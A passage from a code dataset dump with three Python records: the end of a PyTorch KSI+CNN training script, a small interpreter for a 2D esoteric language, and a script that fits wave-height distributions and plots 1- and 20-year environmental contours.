yyy.append(ii[2])\n \n xxx2=np.array(xxx2)\n yyy=np.array(yyy)\n 
batch_data.append((autograd.Variable(torch.from_numpy(main_matrix)),autograd.Variable(torch.FloatTensor(xxx2)),autograd.Variable(torch.FloatTensor(yyy))))\n return batch_data\nbatchtraining_data=preprocessing(training_data)\nbatchtest_data=preprocessing(test_data)\nbatchval_data=preprocessing(val_data)\n\n\n\n\n######################################################################\n# Create the model:\n\nEmbeddingsize=100\nhidden_dim=200\nclass CNN(nn.Module):\n\n def __init__(self, batch_size, vocab_size, tagset_size):\n super(CNN, self).__init__()\n self.hidden_dim = hidden_dim\n self.word_embeddings = nn.Embedding(vocab_size+1, Embeddingsize, padding_idx=0)\n self.embed_drop = nn.Dropout(p=0.2)\n \n self.hidden2tag = nn.Linear(300, tagset_size)\n \n \n self.convs1 = nn.Conv1d(Embeddingsize,100,3)\n self.convs2 = nn.Conv1d(Embeddingsize,100,4)\n self.convs3 = nn.Conv1d(Embeddingsize,100,5)\n \n \n self.layer2 = nn.Linear(Embeddingsize, 1,bias=False)\n self.embedding=nn.Linear(rvocsize,Embeddingsize)\n self.vattention=nn.Linear(Embeddingsize,Embeddingsize)\n \n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n self.dropout = nn.Dropout(0.2)\n \n def forward(self, vec1, nvec, wiki, simlearning):\n \n thisembeddings=self.word_embeddings(vec1)\n thisembeddings = self.embed_drop(thisembeddings)\n thisembeddings=thisembeddings.transpose(1,2)\n \n output1=self.tanh(self.convs1(thisembeddings))\n output1=nn.MaxPool1d(output1.size()[2])(output1)\n \n output2=self.tanh(self.convs2(thisembeddings))\n output2=nn.MaxPool1d(output2.size()[2])(output2)\n \n output3=self.tanh(self.convs3(thisembeddings))\n output3=nn.MaxPool1d(output3.size()[2])(output3)\n \n output4 = torch.cat([output1,output2,output3], 1).squeeze(2)\n \n if simlearning==1:\n nvec=nvec.view(batchsize,1,-1)\n nvec=nvec.expand(batchsize,wiki.size()[0],-1)\n wiki=wiki.view(1,wiki.size()[0],-1)\n wiki=wiki.expand(nvec.size()[0],wiki.size()[1],-1)\n new=wiki*nvec\n new=self.embedding(new)\n vattention=self.sigmoid(self.vattention(new))\n new=new*vattention\n vec3=self.layer2(new)\n vec3=vec3.view(batchsize,-1)\n \n \n vec2 = self.hidden2tag(output4)\n if simlearning==1:\n tag_scores = self.sigmoid(vec2.detach()+vec3)\n else:\n tag_scores = self.sigmoid(vec2)\n \n \n return tag_scores\n\n######################################################################\n# Train the model:\n\ntopk=10\n\ndef trainmodel(model, sim):\n print ('start_training')\n modelsaved=[]\n modelperform=[]\n topk=10\n \n \n bestresults=-1\n bestiter=-1\n for epoch in range(5000): \n model.train()\n \n lossestrain = []\n recall=[]\n for mysentence in batchtraining_data:\n model.zero_grad()\n \n targets = mysentence[2].cuda()\n tag_scores = model(mysentence[0].cuda(),mysentence[1].cuda(),wikivec.cuda(),sim)\n loss = loss_function(tag_scores, targets)\n loss.backward()\n optimizer.step()\n lossestrain.append(loss.data.mean())\n print (epoch)\n modelsaved.append(copy.deepcopy(model.state_dict()))\n print (\"XXXXXXXXXXXXXXXXXXXXXXXXXXXX\")\n model.eval()\n \n recall=[]\n for inputs in batchval_data:\n \n targets = inputs[2].cuda()\n tag_scores = model(inputs[0].cuda(),inputs[1].cuda() ,wikivec.cuda(),sim)\n \n loss = loss_function(tag_scores, targets)\n \n targets=targets.data.cpu().numpy()\n tag_scores= tag_scores.data.cpu().numpy()\n \n \n for iii in range(0,len(tag_scores)):\n temp={}\n for iiii in range(0,len(tag_scores[iii])):\n temp[iiii]=tag_scores[iii][iiii]\n temp1=[(k, temp[k]) for k in sorted(temp, key=temp.get, reverse=True)]\n 
thistop=int(np.sum(targets[iii]))\n hit=0.0\n for ii in temp1[0:max(thistop,topk)]:\n if targets[iii][ii[0]]==1.0:\n hit=hit+1\n if thistop!=0:\n recall.append(hit/thistop)\n \n print ('validation top-',topk, np.mean(recall))\n \n \n \n modelperform.append(np.mean(recall))\n if modelperform[-1]>bestresults:\n bestresults=modelperform[-1]\n bestiter=len(modelperform)-1\n \n if (len(modelperform)-bestiter)>5:\n print (modelperform,bestiter)\n return modelsaved[bestiter]\n \nmodel = CNN(batchsize, len(word_to_ix), len(label_to_ix))\nmodel.cuda()\n\nloss_function = nn.BCELoss()\noptimizer = optim.Adam(model.parameters())\n\nbasemodel= trainmodel(model, 0)\ntorch.save(basemodel, 'CNN_model')\n\nmodel = CNN(batchsize, len(word_to_ix), len(label_to_ix))\nmodel.cuda()\nmodel.load_state_dict(basemodel)\nloss_function = nn.BCELoss()\noptimizer = optim.Adam(model.parameters())\nKSImodel= trainmodel(model, 1)\ntorch.save(KSImodel, 'KSI_CNN_model')\n\ndef testmodel(modelstate, sim):\n model = CNN(batchsize, len(word_to_ix), len(label_to_ix))\n model.cuda()\n model.load_state_dict(modelstate)\n loss_function = nn.BCELoss()\n model.eval()\n recall=[]\n lossestest = []\n \n y_true=[]\n y_scores=[]\n \n \n for inputs in batchtest_data:\n \n targets = inputs[2].cuda()\n \n tag_scores = model(inputs[0].cuda(),inputs[1].cuda() ,wikivec.cuda(),sim)\n\n loss = loss_function(tag_scores, targets)\n \n targets=targets.data.cpu().numpy()\n tag_scores= tag_scores.data.cpu().numpy()\n \n \n lossestest.append(loss.data.mean())\n y_true.append(targets)\n y_scores.append(tag_scores)\n \n for iii in range(0,len(tag_scores)):\n temp={}\n for iiii in range(0,len(tag_scores[iii])):\n temp[iiii]=tag_scores[iii][iiii]\n temp1=[(k, temp[k]) for k in sorted(temp, key=temp.get, reverse=True)]\n thistop=int(np.sum(targets[iii]))\n hit=0.0\n \n for ii in temp1[0:max(thistop,topk)]:\n if targets[iii][ii[0]]==1.0:\n hit=hit+1\n if thistop!=0:\n recall.append(hit/thistop)\n y_true=np.concatenate(y_true,axis=0)\n y_scores=np.concatenate(y_scores,axis=0)\n y_true=y_true.T\n y_scores=y_scores.T\n temptrue=[]\n tempscores=[]\n for col in range(0,len(y_true)):\n if np.sum(y_true[col])!=0:\n temptrue.append(y_true[col])\n tempscores.append(y_scores[col])\n temptrue=np.array(temptrue)\n tempscores=np.array(tempscores)\n y_true=temptrue.T\n y_scores=tempscores.T\n y_pred=(y_scores>0.5).astype(np.int)\n print ('test loss', np.mean(lossestest))\n print ('top-',topk, np.mean(recall))\n print ('macro AUC', roc_auc_score(y_true, y_scores,average='macro'))\n print ('micro AUC', roc_auc_score(y_true, y_scores,average='micro'))\n print ('macro F1', f1_score(y_true, y_pred, average='macro') )\n print ('micro F1', f1_score(y_true, y_pred, average='micro') )\n\nprint ('CNN alone: ')\ntestmodel(basemodel, 0)\nprint ('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\nprint ('KSI+CNN: ')\ntestmodel(KSImodel, 1)", "sub_path": "KSI_CNN.py", "file_name": "KSI_CNN.py", "file_ext": "py", "file_size_in_byte": 9837, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.manual_seed", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 17, "usage_type": "call"}, {"api_name": 
"numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn", 
"line_number": 126, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 128, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 226, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 227, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 235, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 244, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 296, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 298, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 299, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 300, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 301, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 302, "usage_type": "call"}]} +{"seq_id": "308003631", "text": "from codeModule import *\nimport colorama, time, os, sys\nfrom colorama import Fore, Back, Style\n\nclass Stack:\n def __init__(self):\n self.stack = []\n\n def __str__(self):\n t = self.stack[::-1]\n out = \"___\"\n for i in t:\n out = \"{}\\n {} \".format(out, i)\n out = out + \"\\n\" + \"___\"\n return out\n\n def pop(self):\n if self.stack:\n return self.stack.pop()\n else:\n return 0\n\n def push(self, val):\n self.stack.append(val)\n\n\ndef cont(v, a, b):\n if v < a:\n return b\n if v > b:\n return a\n return v\n\n\nclass Pointer:\n def __init__(self, diagram):\n self.UP = 0\n self.RIGHT = 1\n self.DOWN = 2\n self.LEFT = 3\n\n self.diagram = diagram\n self.maxX = self.diagram.calcMaxX()\n self.maxY = len(self.diagram.code)\n self.x = 0\n self.y = 0\n self.dir = self.RIGHT\n\n def forward(self):\n if self.dir == self.UP:\n self.y = cont(self.y - 1, 0, self.maxY-1)\n elif self.dir == self.DOWN:\n self.y = cont(self.y + 1, 0, self.maxY-1)\n elif self.dir == self.RIGHT:\n self.x = cont(self.x + 1, 0, self.maxX-1)\n elif self.dir == self.LEFT:\n self.x = cont(self.x - 1, 0, self.maxX-1)\n\n def turnRight(self):\n self.dir = cont(self.dir + 1, self.UP, self.LEFT)\n\n def turnLeft(self):\n self.dir = cont(self.dir - 1, self.UP, 
self.LEFT)\n\n\nclass Diagram:\n def __init__(self, code=\"\", verbose=False):\n if code:\n self.code = code\n else:\n self.getCode()\n self.stack = Stack()\n self.pointer = Pointer(self)\n self.v = verbose\n if self.v:\n colorama.init()\n\n def getCode(self):\n if len(sys.argv) == 2:\n fName = sys.argv[1]\n else:\n fName = input(\"File Name: \")\n print()\n with open(fName, \"r\") as file:\n data = file.read().split(\"\\n\")\n del data[-1]\n #print(data)\n for i in range(len(data)):\n data[i] = list(data[i])\n #print(data)\n self.code = data\n mx = self.calcMaxX()\n for i in self.code:\n for t in range(mx - len(i)):\n i.append(' ')\n\n def calcMaxX(self):\n lst = list(map(lambda x: len(x), self.code))\n return max(lst)\n\n def run(self):\n while True:\n if self.v:\n if os.name == \"nt\":\n os.system('cls')\n elif os.name == \"posix\":\n os.system('clear')\n for y in range(len(self.code)):\n for x in range(len(self.code[y])):\n #print(\"{}\".format(Style.RESET_ALL), end=\"\")\n style = \"\"\n if x == self.pointer.x and y == self.pointer.y:\n style = Back.RED\n print(\"{}{}\".format(style, self.code[y][x]), end=\"\")\n print(\"{}\".format(Style.RESET_ALL), end=\"\")\n print()\n time.sleep(0.1)\n #print()\n exec(codes[self.code[self.pointer.y][self.pointer.x]])\n self.pointer.forward()\n\n\nif __name__ == \"__main__\":\n d = Diagram(verbose=False)\n d.run()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "colorama.init", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 79, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.name", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 105, "usage_type": "call"}, {"api_name": "os.name", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 107, "usage_type": "call"}, {"api_name": "colorama.Back.RED", "line_number": 113, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 113, "usage_type": "name"}, {"api_name": "colorama.Style.RESET_ALL", "line_number": 115, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 115, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "517749613", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 3 13:59:12 2020\n\n@author: astah\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats import norm, weibull_min, chi2, lognorm, kstest\nfrom scipy.optimize import curve_fit\nfrom read_write import determine_file_name_e1, write_contour, read_contour\nfrom contour_statistics import points_outside\nfrom plot import PlottedSample, plot_contour\nfrom read_write import read_dataset\nplt.close('all')\n\nplt.close('all')\n#%% Functions to fit\n# Power function\ndef power3(x, a, b, c):\n return a + b * x ** c\n\n# Exponential function\ndef exp3(x, a, b, c):\n return a + b * np.exp(c * x)\n\n#%% Read dataset A, B or C.\nDATASET_CHAR = 'A'\nfile_path = '../datasets/' + DATASET_CHAR + '.txt'\nsample_hs, sample_tz, label_hs, label_tz= read_dataset(file_path)\n\ndf = pd.read_csv(file_path, sep='; ')\n#%% Inspect the marginal distributions\n\nweib_par1 = weibull_min.fit(df[df.columns[1]], 
loc=0)\nlogn_par1 = lognorm.fit(df[df.columns[1]], loc=0)\n\nweib_par2 = weibull_min.fit(df[df.columns[2]], loc=0)\nlogn_par2 = lognorm.fit(df[df.columns[2]], loc=0)\n\n#%% Goodness of fit\n\nprint(kstest(df[df.columns[1]].values, 'weibull_min', args=weib_par1)) \nprint(kstest(df[df.columns[1]].values, 'lognorm', args=logn_par1))\n\nprint(kstest(df[df.columns[2]].values, 'weibull_min', args=weib_par2))\nprint(kstest(df[df.columns[2]].values, 'lognorm', args=logn_par2))\n\n#%% Plot the distributions\n#n_bins = 100\n\n#plt.figure()\n#plt.subplot(211)\n#n1, bins1, _ = plt.hist(df[df.columns[1]], n_bins, density=True, label = df.columns[1])\n#plt.plot(bins1, weibull_min.pdf(bins1,*weib_par1), label='Weibull')\n#plt.plot(bins1, lognorm.pdf(bins1,*logn_par1), label='Lognorm')\n#plt.legend(loc='best')\n#plt.subplot(212)\n#n, bins, _ = plt.hist(df[df.columns[2]], n_bins, density=True, label = df.columns[2])\n#plt.plot(bins, weibull_min.pdf(bins,*weib_par2), label='Weibull')\n#plt.plot(bins, lognorm.pdf(bins,*logn_par2), label='Lognorm')\n#plt.legend(loc='best')\n\n#%% Bin the data to find the conditional marginal distribution\ns_min = df[df.columns[1]].min()\ns_max = df[df.columns[1]].max()\n\nbin_size = 0.5\ns_bins = np.arange(np.floor(s_min), np.ceil(s_max), bin_size) + bin_size/2\ns_binedges = s_bins + bin_size/2\n\ns_ind_bin = np.digitize(df[df.columns[1]], bins=s_binedges)\n\nunique, counts = np.unique(s_ind_bin, return_counts=True)\n\nind_min_bin = unique[counts>10][0]\nind_max_bin = unique[counts>10][-1]\nx_bins = s_bins[ind_min_bin:ind_max_bin+1]\nreal_bins = np.zeros(len(x_bins))\n\nlogn_par_cond = np.zeros((len(x_bins),3))\nmu_cond = np.zeros(len(x_bins))\nsig_cond = np.zeros(len(x_bins))\n\nplot_bins = np.arange(0,14,0.2)\n\nfor i in range(len(x_bins)):\n    mask1 = s_ind_bin == i + ind_min_bin\n    real_bins[i] = df[df.columns[1]][mask1].mean()\n    logn_par_cond[i,:] = lognorm.fit(df[df.columns[2]][mask1], floc=0)\n    mu_cond[i] = np.mean(np.log(df[df.columns[2]][mask1]))\n    sig_cond[i] = np.std(np.log(df[df.columns[2]][mask1]))\n#    plt.figure()\n#    b = plt.hist(df[df.columns[2]][mask1], bins= plot_bins, density=True)\n#    plt.plot(b[1], lognorm.pdf(b[1],*logn_par_cond[i,:]), color='g')\n\n#bounds = ([0, 0, -np.inf], [np.inf, np.inf, np.inf])\nbounds = ([-1, 0, -np.inf], [np.inf, np.inf, np.inf])\np0_mu = [0, 2, 0.1]\np0_sig = [0.1, 0.1, -0.3]\n\nmu_vars = curve_fit(power3, real_bins, mu_cond, p0=p0_mu, bounds=bounds)[0]\nsig_vars = curve_fit(exp3, real_bins, sig_cond, p0=p0_sig, bounds=bounds)[0]\n\nsig_func = curve_fit(exp3, real_bins, logn_par_cond[:,0], p0=p0_sig, bounds=bounds)[0]\nmu_func = curve_fit(power3, real_bins, np.log(logn_par_cond[:,2]), p0=p0_mu, bounds=bounds)[0]\n\nplt.figure()\nplt.subplot(211)\nplt.plot(real_bins, np.log(logn_par_cond[:,2]), 'o')\nplt.plot(real_bins, mu_cond, 'o')\nplt.plot(x_bins, power3(x_bins, *mu_func))\nplt.ylabel(r'$\mu$: scale parameter')\nplt.subplot(212)\nplt.plot(real_bins, logn_par_cond[:,0], 'o')\nplt.plot(real_bins, sig_cond, 'o')\nplt.plot(x_bins, exp3(x_bins, *sig_func))\nplt.plot(x_bins, exp3(x_bins, *sig_vars))\nplt.ylabel(r'$\sigma$: shape parameter')\n\n\n#%% Perform the IDS\n\nT1 = 1\nT20 = 20\n\n#beta1 = norm.ppf(1- 10/(T1*len(df)))\n#beta20 = norm.ppf(1- 10/(T20*len(df)))\nbeta1 = np.sqrt(chi2.ppf(1- 10/(T1*len(df)), df=2))\nbeta20 = np.sqrt(chi2.ppf(1- 10/(T20*len(df)), df=2))\n\nphi = np.linspace(0, 2 * np.pi, 360, endpoint=False)\n\nu0_1 = beta1*np.cos(phi)\nu1_1 = beta1*np.sin(phi)\n\nu0_20 = beta20*np.cos(phi)\nu1_20 = 
beta20*np.sin(phi)\n\nx1_1 = lognorm.ppf( norm.cdf(u1_1), *logn_par1)\nx1_20 = lognorm.ppf( norm.cdf(u1_20), *logn_par1)\n\n# The weibull conditional distribution\nsig_x1_1 = exp3(x1_1, *sig_func)\nmu_x1_1 = power3(x1_1, *mu_func)\n\nsig_x1_20 = exp3(x1_20, *sig_func)\nmu_x1_20 = power3(x1_20, *mu_func)\n\nx0_1 = lognorm.ppf( norm.cdf(u0_1), sig_x1_1, loc=0, scale=np.exp(mu_x1_1))\nx0_20 = lognorm.ppf( norm.cdf(u0_20), sig_x1_20, loc=0, scale=np.exp(mu_x1_20))\n#%%\nh = sns.jointplot(x= df.columns[2] , y=df.columns[1] , data=df, s=5)\nh.x, h.y = x0_1, x1_1\nh.plot_joint(plt.plot, color='C1')\nh.x, h.y = x0_20, x1_20\nh.plot_joint(plt.plot, color='C2')\n\n#%% E1 requirements:\n# Save the contours as csv files in the required format.\nfolder_name = 'contour_coordinates/'\nfile_name_1 = determine_file_name_e1('Asta', 'Hannesdottir', DATASET_CHAR, T1)\nwrite_contour(x1_1, #y-axis\n x0_1,\n folder_name + file_name_1,\n label_x=df.columns[1],\n label_y=df.columns[2])\nfile_name_20 = determine_file_name_e1('Asta', 'Hannesdottir', DATASET_CHAR, T20)\nwrite_contour(x1_20,\n x0_20,\n folder_name + file_name_20,\n label_x=df.columns[1],\n label_y=df.columns[2])\n\n# Read the contours from the csv files.\n(contour_hs_1, contour_tz_1) = read_contour(folder_name + file_name_1)\n(contour_hs_20, contour_tz_20) = read_contour(folder_name + file_name_20)\n\n# Find datapoints that exceed the 20-yr contour.\nhs_outside, tz_outside, hs_inside, tz_inside = \\\n points_outside(contour_hs_20,\n contour_tz_20,\n np.asarray(df[df.columns[1]].values),\n np.asarray(df[df.columns[2]].values))\nprint('Number of points outside the contour: ' + str(len(hs_outside)))\n#%%\nnan_mask = np.isnan(contour_tz_20)\n\nfig = plt.figure(figsize=(5, 5), dpi=150)\nax = fig.add_subplot(111)\n\nplotted_sample = PlottedSample(x=np.asarray(sample_tz),\n y=np.asarray(sample_hs),\n ax=ax,\n x_inside=tz_inside,\n y_inside=hs_inside,\n x_outside=tz_outside,\n y_outside=hs_outside,\n return_period=T20)\n# Plot the 1-year contour.\nplot_contour(x=contour_tz_1,\n y=contour_hs_1,\n ax=ax,\n contour_label=str(T1) + '-yr contour',\n x_label=label_tz,\n y_label=label_hs,\n line_style='b--',\n plotted_sample=plotted_sample)\n\n# Plot the 20-year contour and the sample.\nplot_contour(x=contour_tz_20[~nan_mask],\n y=contour_hs_20[~nan_mask],\n ax=ax,\n contour_label=str(T20) + '-yr contour',\n x_label=label_tz,\n y_label=label_hs,\n line_style='b-')#,\n# plotted_sample=plotted_sample)\nplt.title('Dataset ' + DATASET_CHAR)\nplt.show()\nplt.savefig('../results/figures/hannesdottir_asta_dataset_'+DATASET_CHAR+'_1_20.png', dpi=300)", "sub_path": "participants-code/contribution-3/e1_baseline_dataset_a_to_c_asta.py", "file_name": "e1_baseline_dataset_a_to_c_asta.py", "file_ext": "py", "file_size_in_byte": 7528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.close", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "read_write.read_dataset", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min.fit", "line_number": 39, "usage_type": "call"}, {"api_name": 
"scipy.stats.weibull_min", "line_number": 39, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 40, "usage_type": "name"}, {"api_name": "scipy.stats.weibull_min.fit", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min", "line_number": 42, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 43, "usage_type": "name"}, {"api_name": "scipy.stats.kstest", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.digitize", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 94, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 102, "usage_type": "attribute"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 107, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 109, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", 
